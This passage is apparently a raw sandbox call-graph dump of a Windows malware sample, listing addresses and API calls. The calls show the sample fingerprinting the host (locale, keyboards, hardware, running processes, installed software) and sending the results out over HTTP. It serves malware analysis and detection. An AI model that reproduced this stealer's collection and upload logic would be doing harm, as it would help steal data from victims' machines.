lstrcpy 14795->14796 14797 234d50 14796->14797 14798 24a920 3 API calls 14797->14798 14799 234d6e 14798->14799 14800 24a8a0 lstrcpy 14799->14800 14801 234d77 14800->14801 14802 24a740 lstrcpy 14801->14802 14803 234d92 14802->14803 14804 24a920 3 API calls 14803->14804 14805 234db3 14804->14805 14806 24a920 3 API calls 14805->14806 14807 234dba 14806->14807 14808 24a8a0 lstrcpy 14807->14808 14809 234dc6 14808->14809 14810 234de7 lstrlen 14809->14810 14811 234dfa 14810->14811 14812 234e03 lstrlen 14811->14812 15751 24aad0 14812->15751 14814 234e13 HttpSendRequestA 14815 234e32 InternetReadFile 14814->14815 14816 234e67 InternetCloseHandle 14815->14816 14821 234e5e 14815->14821 14819 24a800 14816->14819 14818 24a9b0 4 API calls 14818->14821 14819->14741 14820 24a8a0 lstrcpy 14820->14821 14821->14815 14821->14816 14821->14818 14821->14820 15758 24aad0 14822->15758 14824 2417c4 StrCmpCA 14825 2417cf ExitProcess 14824->14825 14836 2417d7 14824->14836 14826 2419c2 14826->13745 14827 2418ad StrCmpCA 14827->14836 14828 2418cf StrCmpCA 14828->14836 14829 241970 StrCmpCA 14829->14836 14830 2418f1 StrCmpCA 14830->14836 14831 241951 StrCmpCA 14831->14836 14832 241932 StrCmpCA 14832->14836 14833 241913 StrCmpCA 14833->14836 14834 24185d StrCmpCA 14834->14836 14835 24187f StrCmpCA 14835->14836 14836->14826 14836->14827 14836->14828 14836->14829 14836->14830 14836->14831 14836->14832 14836->14833 14836->14834 14836->14835 14837 24a820 lstrlen lstrcpy 14836->14837 14837->14836 14839 24a7a0 lstrcpy 14838->14839 14840 235979 14839->14840 14841 2347b0 2 API calls 14840->14841 14842 235985 14841->14842 14843 24a740 lstrcpy 14842->14843 14844 2359ba 14843->14844 14845 24a740 lstrcpy 14844->14845 14846 2359c7 14845->14846 14847 24a740 lstrcpy 14846->14847 14848 2359d4 14847->14848 14849 24a740 lstrcpy 14848->14849 14850 2359e1 14849->14850 14851 24a740 lstrcpy 14850->14851 14852 2359ee InternetOpenA StrCmpCA 14851->14852 14853 235a1d 14852->14853 14854 235fc3 InternetCloseHandle 14853->14854 14856 248b60 3 API calls 14853->14856 14855 235fe0 14854->14855 14858 239ac0 4 API calls 14855->14858 14857 235a3c 14856->14857 14859 24a920 3 API calls 14857->14859 14861 235fe6 14858->14861 14860 235a4f 14859->14860 14862 24a8a0 lstrcpy 14860->14862 14863 24a820 2 API calls 14861->14863 14865 23601f codecvt 14861->14865 14867 235a58 14862->14867 14864 235ffd 14863->14864 14866 24a9b0 4 API calls 14864->14866 14869 24a7a0 lstrcpy 14865->14869 14868 236013 14866->14868 14871 24a9b0 4 API calls 14867->14871 14870 24a8a0 lstrcpy 14868->14870 14879 23604f 14869->14879 14870->14865 14872 235a82 14871->14872 14873 24a8a0 lstrcpy 14872->14873 14874 235a8b 14873->14874 14875 24a9b0 4 API calls 14874->14875 14876 235aaa 14875->14876 14877 24a8a0 lstrcpy 14876->14877 14878 235ab3 14877->14878 14880 24a920 3 API calls 14878->14880 14879->13751 14881 235ad1 14880->14881 14882 24a8a0 lstrcpy 14881->14882 14883 235ada 14882->14883 14884 24a9b0 4 API calls 14883->14884 14885 235af9 14884->14885 14886 24a8a0 lstrcpy 14885->14886 14887 235b02 14886->14887 14888 24a9b0 4 API calls 14887->14888 14889 235b21 14888->14889 14890 24a8a0 lstrcpy 14889->14890 14891 235b2a 14890->14891 14892 24a9b0 4 API calls 14891->14892 14893 235b56 14892->14893 14894 24a920 3 API calls 14893->14894 14895 235b5d 14894->14895 14896 24a8a0 lstrcpy 14895->14896 14897 235b66 14896->14897 14898 235b7c InternetConnectA 14897->14898 14898->14854 14899 235bac HttpOpenRequestA 14898->14899 14901 235fb6 InternetCloseHandle 14899->14901 14902 235c0b 14899->14902 14901->14854 14903 24a9b0 4 API calls 14902->14903 14904 235c1f 14903->14904 14905 24a8a0 lstrcpy 14904->14905 14906 235c28 14905->14906 14907 24a920 3 API calls 14906->14907 14908 235c46 14907->14908 14909 24a8a0 lstrcpy 14908->14909 14910 235c4f 14909->14910 14911 24a9b0 4 API calls 14910->14911 14912 235c6e 14911->14912 14913 24a8a0 lstrcpy 14912->14913 14914 235c77 14913->14914 14915 24a9b0 4 API calls 14914->14915 14916 235c98 14915->14916 14917 24a8a0 lstrcpy 14916->14917 14918 235ca1 14917->14918 14919 24a9b0 4 API calls 14918->14919 14920 235cc1 14919->14920 14921 24a8a0 lstrcpy 14920->14921 14922 235cca 14921->14922 14923 24a9b0 4 API calls 14922->14923 14924 235ce9 14923->14924 14925 24a8a0 lstrcpy 14924->14925 14926 235cf2 14925->14926 14927 24a920 3 API calls 14926->14927 14928 235d10 14927->14928 14929 24a8a0 lstrcpy 14928->14929 14930 235d19 14929->14930 14931 24a9b0 4 API calls 14930->14931 14932 235d38 14931->14932 14933 24a8a0 lstrcpy 14932->14933 14934 235d41 14933->14934 14935 24a9b0 4 API calls 14934->14935 14936 235d60 14935->14936 14937 24a8a0 lstrcpy 14936->14937 14938 235d69 14937->14938 14939 24a920 3 API calls 14938->14939 14940 235d87 14939->14940 14941 24a8a0 lstrcpy 14940->14941 14942 235d90 14941->14942 14943 24a9b0 4 API calls 14942->14943 14944 235daf 14943->14944 14945 24a8a0 lstrcpy 14944->14945 14946 235db8 14945->14946 14947 24a9b0 4 API calls 14946->14947 14948 235dd9 14947->14948 14949 24a8a0 lstrcpy 14948->14949 14950 235de2 14949->14950 14951 24a9b0 4 API calls 14950->14951 14952 235e02 14951->14952 14953 24a8a0 lstrcpy 14952->14953 14954 235e0b 14953->14954 14955 24a9b0 4 API calls 14954->14955 14956 235e2a 14955->14956 14957 24a8a0 lstrcpy 14956->14957 14958 235e33 14957->14958 14959 24a920 3 API calls 14958->14959 14960 235e54 14959->14960 14961 24a8a0 lstrcpy 14960->14961 14962 235e5d 14961->14962 14963 235e70 lstrlen 14962->14963 15759 24aad0 14963->15759 14965 235e81 lstrlen GetProcessHeap RtlAllocateHeap 15760 24aad0 14965->15760 14967 235eae lstrlen 14968 235ebe 14967->14968 14969 235ed7 lstrlen 14968->14969 14970 235ee7 14969->14970 14971 235ef0 lstrlen 14970->14971 14972 235f03 14971->14972 14973 235f1a lstrlen 14972->14973 15761 24aad0 14973->15761 14975 235f2a HttpSendRequestA 14976 235f35 InternetReadFile 14975->14976 14977 235f6a InternetCloseHandle 14976->14977 14981 235f61 14976->14981 14977->14901 14979 24a9b0 4 API calls 14979->14981 14980 24a8a0 lstrcpy 14980->14981 14981->14976 14981->14977 14981->14979 14981->14980 14983 241077 14982->14983 14984 241151 14983->14984 14985 24a820 lstrlen lstrcpy 14983->14985 14984->13753 14985->14983 14988 240db7 14986->14988 14987 240f17 14987->13761 14988->14987 14989 240ea4 StrCmpCA 14988->14989 14990 240e27 StrCmpCA 14988->14990 14991 240e67 StrCmpCA 14988->14991 14992 24a820 lstrlen lstrcpy 14988->14992 14989->14988 14990->14988 14991->14988 14992->14988 14994 240f67 14993->14994 14995 240fb2 StrCmpCA 14994->14995 14996 241044 14994->14996 14997 24a820 lstrlen lstrcpy 14994->14997 14995->14994 14996->13769 14997->14994 14999 24a740 lstrcpy 14998->14999 15000 241a26 14999->15000 15001 24a9b0 4 API calls 15000->15001 15002 241a37 15001->15002 15003 24a8a0 lstrcpy 15002->15003 15004 241a40 15003->15004 15005 24a9b0 4 API calls 15004->15005 15006 241a5b 15005->15006 15007 24a8a0 lstrcpy 15006->15007 15008 241a64 15007->15008 15009 24a9b0 4 API calls 15008->15009 15010 241a7d 15009->15010 15011 24a8a0 lstrcpy 15010->15011 15012 241a86 15011->15012 15013 24a9b0 4 API calls 15012->15013 15014 241aa1 15013->15014 15015 24a8a0 lstrcpy 15014->15015 15016 241aaa 15015->15016 15017 24a9b0 4 API calls 15016->15017 15018 241ac3 15017->15018 15019 24a8a0 lstrcpy 15018->15019 15020 241acc 15019->15020 15021 24a9b0 4 API calls 15020->15021 15022 241ae7 15021->15022 15023 24a8a0 lstrcpy 15022->15023 15024 241af0 15023->15024 15025 24a9b0 4 API calls 15024->15025 15026 241b09 15025->15026 15027 24a8a0 lstrcpy 15026->15027 15028 241b12 15027->15028 15029 24a9b0 4 API calls 15028->15029 15030 241b2d 15029->15030 15031 24a8a0 lstrcpy 15030->15031 15032 241b36 15031->15032 15033 24a9b0 4 API calls 15032->15033 15034 241b4f 15033->15034 15035 24a8a0 lstrcpy 15034->15035 15036 241b58 15035->15036 15037 24a9b0 4 API calls 15036->15037 15038 241b76 15037->15038 15039 24a8a0 lstrcpy 15038->15039 15040 241b7f 15039->15040 15041 247500 6 API calls 15040->15041 15042 241b96 15041->15042 15043 24a920 3 API calls 15042->15043 15044 241ba9 15043->15044 15045 24a8a0 lstrcpy 15044->15045 15046 241bb2 15045->15046 15047 24a9b0 4 API calls 15046->15047 15048 241bdc 15047->15048 15049 24a8a0 lstrcpy 15048->15049 15050 241be5 15049->15050 15051 24a9b0 4 API calls 15050->15051 15052 241c05 15051->15052 15053 24a8a0 lstrcpy 15052->15053 15054 241c0e 15053->15054 15762 247690 GetProcessHeap RtlAllocateHeap 15054->15762 15057 24a9b0 4 API calls 15058 241c2e 15057->15058 15059 24a8a0 lstrcpy 15058->15059 15060 241c37 15059->15060 15061 24a9b0 4 API calls 15060->15061 15062 241c56 15061->15062 15063 24a8a0 lstrcpy 15062->15063 15064 241c5f 15063->15064 15065 24a9b0 4 API calls 15064->15065 15066 241c80 15065->15066 15067 24a8a0 lstrcpy 15066->15067 15068 241c89 15067->15068 15769 2477c0 GetCurrentProcess IsWow64Process 15068->15769 15071 24a9b0 4 API calls 15072 241ca9 15071->15072 15073 24a8a0 lstrcpy 15072->15073 15074 241cb2 15073->15074 15075 24a9b0 4 API calls 15074->15075 15076 241cd1 15075->15076 15077 24a8a0 lstrcpy 15076->15077 15078 241cda 15077->15078 15079 24a9b0 4 API calls 15078->15079 15080 241cfb 15079->15080 15081 24a8a0 lstrcpy 15080->15081 15082 241d04 15081->15082 15083 247850 3 API calls 15082->15083 15084 241d14 15083->15084 15085 24a9b0 4 API calls 15084->15085 15086 241d24 15085->15086 15087 24a8a0 lstrcpy 15086->15087 15088 241d2d 15087->15088 15089 24a9b0 4 API calls 15088->15089 15090 241d4c 15089->15090 15091 24a8a0 lstrcpy 15090->15091 15092 241d55 15091->15092 15093 24a9b0 4 API calls 15092->15093 15094 241d75 15093->15094 15095 24a8a0 lstrcpy 15094->15095 15096 241d7e 15095->15096 15097 2478e0 3 API calls 15096->15097 15098 241d8e 15097->15098 15099 24a9b0 4 API calls 15098->15099 15100 241d9e 15099->15100 15101 24a8a0 lstrcpy 15100->15101 15102 241da7 15101->15102 15103 24a9b0 4 API calls 15102->15103 15104 241dc6 15103->15104 15105 24a8a0 lstrcpy 15104->15105 15106 241dcf 15105->15106 15107 24a9b0 4 API calls 15106->15107 15108 241df0 15107->15108 15109 24a8a0 lstrcpy 15108->15109 15110 241df9 15109->15110 15771 247980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15110->15771 15113 24a9b0 4 API calls 15114 241e19 15113->15114 15115 24a8a0 lstrcpy 15114->15115 15116 241e22 15115->15116 15117 24a9b0 4 API calls 15116->15117 15118 241e41 15117->15118 15119 24a8a0 lstrcpy 15118->15119 15120 241e4a 15119->15120 15121 24a9b0 4 API calls 15120->15121 15122 241e6b 15121->15122 15123 24a8a0 lstrcpy 15122->15123 15124 241e74 15123->15124 15773 247a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15124->15773 15127 24a9b0 4 API calls 15128 241e94 15127->15128 15129 24a8a0 lstrcpy 15128->15129 15130 241e9d 15129->15130 15131 24a9b0 4 API calls 15130->15131 15132 241ebc 15131->15132 15133 24a8a0 lstrcpy 15132->15133 15134 241ec5 15133->15134 15135 24a9b0 4 API calls 15134->15135 15136 241ee5 15135->15136 15137 24a8a0 lstrcpy 15136->15137 15138 241eee 15137->15138 15776 247b00 GetUserDefaultLocaleName 15138->15776 15141 24a9b0 4 API calls 15142 241f0e 15141->15142 15143 24a8a0 lstrcpy 15142->15143 15144 241f17 15143->15144 15145 24a9b0 4 API calls 15144->15145 15146 241f36 15145->15146 15147 24a8a0 lstrcpy 15146->15147 15148 241f3f 15147->15148 15149 24a9b0 4 API calls 15148->15149 15150 241f60 15149->15150 15151 24a8a0 lstrcpy 15150->15151 15152 241f69 15151->15152 15780 247b90 15152->15780 15154 241f80 15155 24a920 3 API calls 15154->15155 15156 241f93 15155->15156 15157 24a8a0 lstrcpy 15156->15157 15158 241f9c 15157->15158 15159 24a9b0 4 API calls 15158->15159 15160 241fc6 15159->15160 15161 24a8a0 lstrcpy 15160->15161 15162 241fcf 15161->15162 15163 24a9b0 4 API calls 15162->15163 15164 241fef 15163->15164 15165 24a8a0 lstrcpy 15164->15165 15166 241ff8 15165->15166 15792 247d80 GetSystemPowerStatus 15166->15792 15169 24a9b0 4 API calls 15170 242018 15169->15170 15171 24a8a0 lstrcpy 15170->15171 15172 242021 15171->15172 15173 24a9b0 4 API calls 15172->15173 15174 242040 15173->15174 15175 24a8a0 lstrcpy 15174->15175 15176 242049 15175->15176 15177 24a9b0 4 API calls 15176->15177 15178 24206a 15177->15178 15179 24a8a0 lstrcpy 15178->15179 15180 242073 15179->15180 15181 24207e GetCurrentProcessId 15180->15181 15794 249470 OpenProcess 15181->15794 15184 24a920 3 API calls 15185 2420a4 15184->15185 15186 24a8a0 lstrcpy 15185->15186 15187 2420ad 15186->15187 15188 24a9b0 4 API calls 15187->15188 15189 2420d7 15188->15189 15190 24a8a0 lstrcpy 15189->15190 15191 2420e0 15190->15191 15192 24a9b0 4 API calls 15191->15192 15193 242100 15192->15193 15194 24a8a0 lstrcpy 15193->15194 15195 242109 15194->15195 15799 247e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15195->15799 15198 24a9b0 4 API calls 15199 242129 15198->15199 15200 24a8a0 lstrcpy 15199->15200 15201 242132 15200->15201 15202 24a9b0 4 API calls 15201->15202 15203 242151 15202->15203 15204 24a8a0 lstrcpy 15203->15204 15205 24215a 15204->15205 15206 24a9b0 4 API calls 15205->15206 15207 24217b 15206->15207 15208 24a8a0 lstrcpy 15207->15208 15209 242184 15208->15209 15803 247f60 15209->15803 15212 24a9b0 4 API calls 15213 2421a4 15212->15213 15214 24a8a0 lstrcpy 15213->15214 15215 2421ad 15214->15215 15216 24a9b0 4 API calls 15215->15216 15217 2421cc 15216->15217 15218 24a8a0 lstrcpy 15217->15218 15219 2421d5 15218->15219 15220 24a9b0 4 API calls 15219->15220 15221 2421f6 15220->15221 15222 24a8a0 lstrcpy 15221->15222 15223 2421ff 15222->15223 15816 247ed0 GetSystemInfo wsprintfA 15223->15816 15226 24a9b0 4 API calls 15227 24221f 15226->15227 15228 24a8a0 lstrcpy 15227->15228 15229 242228 15228->15229 15230 24a9b0 4 API calls 15229->15230 15231 242247 15230->15231 15232 24a8a0 lstrcpy 15231->15232 15233 242250 15232->15233 15234 24a9b0 4 API calls 15233->15234 15235 242270 15234->15235 15236 24a8a0 lstrcpy 15235->15236 15237 242279 15236->15237 15818 248100 GetProcessHeap RtlAllocateHeap 15237->15818 15240 24a9b0 4 API calls 15241 242299 15240->15241 15242 24a8a0 lstrcpy 15241->15242 15243 2422a2 15242->15243 15244 24a9b0 4 API calls 15243->15244 15245 2422c1 15244->15245 15246 24a8a0 lstrcpy 15245->15246 15247 2422ca 15246->15247 15248 24a9b0 4 API calls 15247->15248 15249 2422eb 15248->15249 15250 24a8a0 lstrcpy 15249->15250 15251 2422f4 15250->15251 15824 2487c0 15251->15824 15254 24a920 3 API calls 15255 24231e 15254->15255 15256 24a8a0 lstrcpy 15255->15256 15257 242327 15256->15257 15258 24a9b0 4 API calls 15257->15258 15259 242351 15258->15259 15260 24a8a0 lstrcpy 15259->15260 15261 24235a 15260->15261 15262 24a9b0 4 API calls 15261->15262 15263 24237a 15262->15263 15264 24a8a0 lstrcpy 15263->15264 15265 242383 15264->15265 15266 24a9b0 4 API calls 15265->15266 15267 2423a2 15266->15267 15268 24a8a0 lstrcpy 15267->15268 15269 2423ab 15268->15269 15829 2481f0 15269->15829 15271 2423c2 15272 24a920 3 API calls 15271->15272 15273 2423d5 15272->15273 15274 24a8a0 lstrcpy 15273->15274 15275 2423de 15274->15275 15276 24a9b0 4 API calls 15275->15276 15277 24240a 15276->15277 15278 24a8a0 lstrcpy 15277->15278 15279 242413 15278->15279 15280 24a9b0 4 API calls 15279->15280 15281 242432 15280->15281 15282 24a8a0 lstrcpy 15281->15282 15283 24243b 15282->15283 15284 24a9b0 4 API calls 15283->15284 15285 24245c 15284->15285 15286 24a8a0 lstrcpy 15285->15286 15287 242465 15286->15287 15288 24a9b0 4 API calls 15287->15288 15289 242484 15288->15289 15290 24a8a0 lstrcpy 15289->15290 15291 24248d 15290->15291 15292 24a9b0 4 API calls 15291->15292 15293 2424ae 15292->15293 15294 24a8a0 lstrcpy 15293->15294 15295 2424b7 15294->15295 15837 248320 15295->15837 15297 2424d3 15298 24a920 3 API calls 15297->15298 15299 2424e6 15298->15299 15300 24a8a0 lstrcpy 15299->15300 15301 2424ef 15300->15301 15302 24a9b0 4 API calls 15301->15302 15303 242519 15302->15303 15304 24a8a0 lstrcpy 15303->15304 15305 242522 15304->15305 15306 24a9b0 4 API calls 15305->15306 15307 242543 15306->15307 15308 24a8a0 lstrcpy 15307->15308 15309 24254c 15308->15309 15310 248320 17 API calls 15309->15310 15311 242568 15310->15311 15312 24a920 3 API calls 15311->15312 15313 24257b 15312->15313 15314 24a8a0 lstrcpy 15313->15314 15315 242584 15314->15315 15316 24a9b0 4 API calls 15315->15316 15317 2425ae 15316->15317 15318 24a8a0 lstrcpy 15317->15318 15319 2425b7 15318->15319 15320 24a9b0 4 API calls 15319->15320 15321 2425d6 15320->15321 15322 24a8a0 lstrcpy 15321->15322 15323 2425df 15322->15323 15324 24a9b0 4 API calls 15323->15324 15325 242600 15324->15325 15326 24a8a0 lstrcpy 15325->15326 15327 242609 15326->15327 15873 248680 15327->15873 15329 242620 15330 24a920 3 API calls 15329->15330 15331 242633 15330->15331 15332 24a8a0 lstrcpy 15331->15332 15333 24263c 15332->15333 15334 24265a lstrlen 15333->15334 15335 24266a 15334->15335 15336 24a740 lstrcpy 15335->15336 15337 24267c 15336->15337 15338 231590 lstrcpy 15337->15338 15339 24268d 15338->15339 15883 245190 15339->15883 15341 242699 15341->13773 16071 24aad0 15342->16071 15344 235009 InternetOpenUrlA 15347 235021 15344->15347 15345 2350a0 InternetCloseHandle InternetCloseHandle 15348 2350ec 15345->15348 15346 23502a InternetReadFile 15346->15347 15347->15345 15347->15346 15348->13777 16072 2398d0 15349->16072 15351 240759 15352 24077d 15351->15352 15353 240a38 15351->15353 15355 240799 StrCmpCA 15352->15355 15354 231590 lstrcpy 15353->15354 15356 240a49 15354->15356 15357 2407a8 15355->15357 15385 240843 15355->15385 16248 240250 15356->16248 15359 24a7a0 lstrcpy 15357->15359 15360 2407c3 15359->15360 15362 231590 lstrcpy 15360->15362 15361 240865 StrCmpCA 15364 240874 15361->15364 15401 24096b 15361->15401 15366 24080c 15362->15366 15365 24a740 lstrcpy 15364->15365 15367 240881 15365->15367 15368 24a7a0 lstrcpy 15366->15368 15372 24a9b0 4 API calls 15367->15372 15373 240823 15368->15373 15369 24099c StrCmpCA 15370 240a2d 15369->15370 15371 2409ab 15369->15371 15370->13781 15374 231590 lstrcpy 15371->15374 15375 2408ac 15372->15375 15376 24a7a0 lstrcpy 15373->15376 15377 2409f4 15374->15377 15378 24a920 3 API calls 15375->15378 15379 24083e 15376->15379 15380 24a7a0 lstrcpy 15377->15380 15381 2408b3 15378->15381 16075 23fb00 15379->16075 15383 240a0d 15380->15383 15384 24a9b0 4 API calls 15381->15384 15386 24a7a0 lstrcpy 15383->15386 15387 2408ba 15384->15387 15385->15361 15388 240a28 15386->15388 15401->15369 15723 24a7a0 lstrcpy 15722->15723 15724 231683 15723->15724 15725 24a7a0 lstrcpy 15724->15725 15726 231695 15725->15726 15727 24a7a0 lstrcpy 15726->15727 15728 2316a7 15727->15728 15729 24a7a0 lstrcpy 15728->15729 15730 2315a3 15729->15730 15730->14604 15732 2347c6 15731->15732 15733 234838 lstrlen 15732->15733 15757 24aad0 15733->15757 15735 234848 InternetCrackUrlA 15736 234867 15735->15736 15736->14681 15738 24a740 lstrcpy 15737->15738 15739 248b74 15738->15739 15740 24a740 lstrcpy 15739->15740 15741 248b82 GetSystemTime 15740->15741 15743 248b99 15741->15743 15742 24a7a0 lstrcpy 15744 248bfc 15742->15744 15743->15742 15744->14696 15746 24a931 15745->15746 15747 24a988 15746->15747 15749 24a968 lstrcpy lstrcat 15746->15749 15748 24a7a0 lstrcpy 15747->15748 15750 24a994 15748->15750 15749->15747 15750->14699 15751->14814 15753 234eee 15752->15753 15754 239af9 LocalAlloc 15752->15754 15753->14702 15753->14704 15754->15753 15755 239b14 CryptStringToBinaryA 15754->15755 15755->15753 15756 239b39 LocalFree 15755->15756 15756->15753 15757->15735 15758->14824 15759->14965 15760->14967 15761->14975 15890 2477a0 15762->15890 15765 2476c6 RegOpenKeyExA 15767 247704 RegCloseKey 15765->15767 15768 2476e7 RegQueryValueExA 15765->15768 15766 241c1e 15766->15057 15767->15766 15768->15767 15770 241c99 15769->15770 15770->15071 15772 241e09 15771->15772 15772->15113 15774 241e84 15773->15774 15775 247a9a wsprintfA 15773->15775 15774->15127 15775->15774 15777 247b4d 15776->15777 15779 241efe 15776->15779 15897 248d20 LocalAlloc CharToOemW 15777->15897 15779->15141 15781 24a740 lstrcpy 15780->15781 15782 247bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15781->15782 15790 247c25 15782->15790 15783 247c46 GetLocaleInfoA 15783->15790 15784 247d18 15785 247d1e LocalFree 15784->15785 15786 247d28 15784->15786 15785->15786 15787 24a7a0 lstrcpy 15786->15787 15789 247d37 15787->15789 15788 24a9b0 lstrcpy lstrlen lstrcpy lstrcat 15788->15790 15789->15154 15790->15783 15790->15784 15790->15788 15791 24a8a0 lstrcpy 15790->15791 15791->15790 15793 242008 15792->15793 15793->15169 15795 2494b5 15794->15795 15796 249493 GetModuleFileNameExA CloseHandle 15794->15796 15797 24a740 lstrcpy 15795->15797 15796->15795 15798 242091 15797->15798 15798->15184 15800 247e68 RegQueryValueExA 15799->15800 15802 242119 15799->15802 15801 247e8e RegCloseKey 15800->15801 15801->15802 15802->15198 15804 247fb9 GetLogicalProcessorInformationEx 15803->15804 15805 247fd8 GetLastError 15804->15805 15806 248029 15804->15806 15813 247fe3 15805->15813 15815 248022 15805->15815 15809 2489f0 2 API calls 15806->15809 15812 24807b 15809->15812 15810 2489f0 2 API calls 15811 242194 15810->15811 15811->15212 15814 248084 wsprintfA 15812->15814 15812->15815 15813->15804 15813->15811 15898 2489f0 15813->15898 15901 248a10 GetProcessHeap RtlAllocateHeap 15813->15901 15814->15811 15815->15810 15815->15811 15817 24220f 15816->15817 15817->15226 15819 2489b0 15818->15819 15820 24814d GlobalMemoryStatusEx 15819->15820 15823 248163 15820->15823 15821 24819b wsprintfA 15822 242289 15821->15822 15822->15240 15823->15821 15825 2487fb GetProcessHeap RtlAllocateHeap wsprintfA 15824->15825 15827 24a740 lstrcpy 15825->15827 15828 24230b 15827->15828 15828->15254 15830 24a740 lstrcpy 15829->15830 15834 248229 15830->15834 15831 248263 15833 24a7a0 lstrcpy 15831->15833 15832 24a9b0 lstrcpy lstrlen lstrcpy lstrcat 15832->15834 15835 2482dc 15833->15835 15834->15831 15834->15832 15836 24a8a0 lstrcpy 15834->15836 15835->15271 15836->15834 15838 24a740 lstrcpy 15837->15838 15839 24835c RegOpenKeyExA 15838->15839 15840 2483d0 15839->15840 15841 2483ae 15839->15841 15843 248613 RegCloseKey 15840->15843 15844 2483f8 RegEnumKeyExA 15840->15844 15842 24a7a0 lstrcpy 15841->15842 15854 2483bd 15842->15854 15847 24a7a0 lstrcpy 15843->15847 15845 24860e 15844->15845 15846 24843f wsprintfA RegOpenKeyExA 15844->15846 15845->15843 15848 248485 RegCloseKey RegCloseKey 15846->15848 15849 2484c1 RegQueryValueExA 15846->15849 15847->15854 15850 24a7a0 lstrcpy 15848->15850 15851 248601 RegCloseKey 15849->15851 15852 2484fa lstrlen 15849->15852 15850->15854 15851->15845 15852->15851 15853 248510 15852->15853 15855 24a9b0 4 API calls 15853->15855 15854->15297 15856 248527 15855->15856 15857 24a8a0 lstrcpy 15856->15857 15858 248533 15857->15858 15859 24a9b0 4 API calls 15858->15859 15860 248557 15859->15860 15861 24a8a0 lstrcpy 15860->15861 15862 248563 15861->15862 15863 24856e RegQueryValueExA 15862->15863 15863->15851 15864 2485a3 15863->15864 15865 24a9b0 4 API calls 15864->15865 15866 2485ba 15865->15866 15867 24a8a0 lstrcpy 15866->15867 15868 2485c6 15867->15868 15869 24a9b0 4 API calls 15868->15869 15870 2485ea 15869->15870 15871 24a8a0 lstrcpy 15870->15871 15872 2485f6 15871->15872 15872->15851 15874 24a740 lstrcpy 15873->15874 15875 2486bc CreateToolhelp32Snapshot Process32First 15874->15875 15876 24875d CloseHandle 15875->15876 15877 2486e8 Process32Next 15875->15877 15878 24a7a0 lstrcpy 15876->15878 15877->15876 15882 2486fd 15877->15882 15880 248776 15878->15880 15879 24a8a0 lstrcpy 15879->15882 15880->15329 15881 24a9b0 lstrcpy lstrlen lstrcpy lstrcat 15881->15882 15882->15877 15882->15879 15882->15881 15884 24a7a0 lstrcpy 15883->15884 15885 2451b5 15884->15885 15886 231590 lstrcpy 15885->15886 15887 2451c6 15886->15887 15902 235100 15887->15902 15889 2451cf 15889->15341 15893 247720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15890->15893 15892 2476b9 15892->15765 15892->15766 15894 247765 RegQueryValueExA 15893->15894 15895 247780 RegCloseKey 15893->15895 15894->15895 15896 247793 15895->15896 15896->15892 15897->15779 15899 248a0c 15898->15899 15900 2489f9 GetProcessHeap HeapFree 15898->15900 15899->15813 15900->15899 15901->15813 15903 24a7a0 lstrcpy 15902->15903 15904 235119 15903->15904 15905 2347b0 2 API calls 15904->15905 15906 235125 15905->15906 16062 248ea0 15906->16062 15908 235184 15909 235192 lstrlen 15908->15909 15910 2351a5 15909->15910 15911 248ea0 4 API calls 15910->15911 15912 2351b6 15911->15912 15913 24a740 lstrcpy 15912->15913 15914 2351c9 15913->15914 15915 24a740 lstrcpy 15914->15915 15916 2351d6 15915->15916 15917 24a740 lstrcpy 15916->15917 15918 2351e3 15917->15918 15919 24a740 lstrcpy 15918->15919 15920 2351f0 15919->15920 15921 24a740 lstrcpy 15920->15921 15922 2351fd InternetOpenA StrCmpCA 15921->15922 15923 23522f 15922->15923 15924 2358c4 InternetCloseHandle 15923->15924 15925 248b60 3 API calls 15923->15925 15931 2358d9 codecvt 15924->15931 15926 23524e 15925->15926 15927 24a920 3 API calls 15926->15927 15928 235261 15927->15928 15929 24a8a0 lstrcpy 15928->15929 15930 23526a 15929->15930 15932 24a9b0 4 API calls 15930->15932 15935 24a7a0 lstrcpy 15931->15935 15933 2352ab 15932->15933 15934 24a920 3 API calls 15933->15934 15936 2352b2 15934->15936 15943 235913 15935->15943 15937 24a9b0 4 API calls 15936->15937 15938 2352b9 15937->15938 15939 24a8a0 lstrcpy 15938->15939 15940 2352c2 15939->15940 15941 24a9b0 4 API calls 15940->15941 15942 235303 15941->15942 15944 24a920 3 API calls 15942->15944 15943->15889 15945 23530a 15944->15945 15946 24a8a0 lstrcpy 15945->15946 15947 235313 15946->15947 15948 235329 InternetConnectA 15947->15948 15948->15924 15949 235359 HttpOpenRequestA 15948->15949 15951 2358b7 InternetCloseHandle 15949->15951 15952 2353b7 15949->15952 15951->15924 15953 24a9b0 4 API calls 15952->15953 15954 2353cb 15953->15954 15955 24a8a0 lstrcpy 15954->15955 15956 2353d4 15955->15956 15957 24a920 3 API calls 15956->15957 15958 2353f2 15957->15958 15959 24a8a0 lstrcpy 15958->15959 15960 2353fb 15959->15960 15961 24a9b0 4 API calls 15960->15961 15962 23541a 15961->15962 15963 24a8a0 lstrcpy 15962->15963 15964 235423 15963->15964 15965 24a9b0 4 API calls 15964->15965 15966 235444 15965->15966 15967 24a8a0 lstrcpy 15966->15967 15968 23544d 15967->15968 15969 24a9b0 4 API calls 15968->15969 15970 23546e 15969->15970 15971 24a8a0 lstrcpy 15970->15971 16063 248ead CryptBinaryToStringA 16062->16063 16066 248ea9 16062->16066 16064 248ece GetProcessHeap RtlAllocateHeap 16063->16064 16063->16066 16065 248ef4 codecvt 16064->16065 16064->16066 16067 248f05 CryptBinaryToStringA 16065->16067 16066->15908 16067->16066 16071->15344 16314 239880 16072->16314 16074 2398e1 16074->15351 16076 24a740 lstrcpy 16075->16076 16249 24a740 lstrcpy 16248->16249 16250 240266 16249->16250 16251 248de0 2 API calls 16250->16251 16252 24027b 16251->16252 16253 24a920 3 API calls 16252->16253 16254 24028b 16253->16254 16255 24a8a0 lstrcpy 16254->16255 16256 240294 16255->16256 16257 24a9b0 4 API calls 16256->16257 16258 2402b8 16257->16258 16315 23988e 16314->16315 16318 236fb0 16315->16318 16317 2398ad codecvt 16317->16074 16321 236d40 16318->16321 16322 236d63 16321->16322 16335 236d59 16321->16335 16337 236530 16322->16337 16326 236dbe 16326->16335 16347 2369b0 16326->16347 16328 236e2a 16329 236ee6 VirtualFree 16328->16329 16331 236ef7 16328->16331 16328->16335 16329->16331 16330 236f41 16332 2489f0 2 API calls 16330->16332 16330->16335 16331->16330 16333 236f26 FreeLibrary 16331->16333 16334 236f38 16331->16334 16332->16335 16333->16331 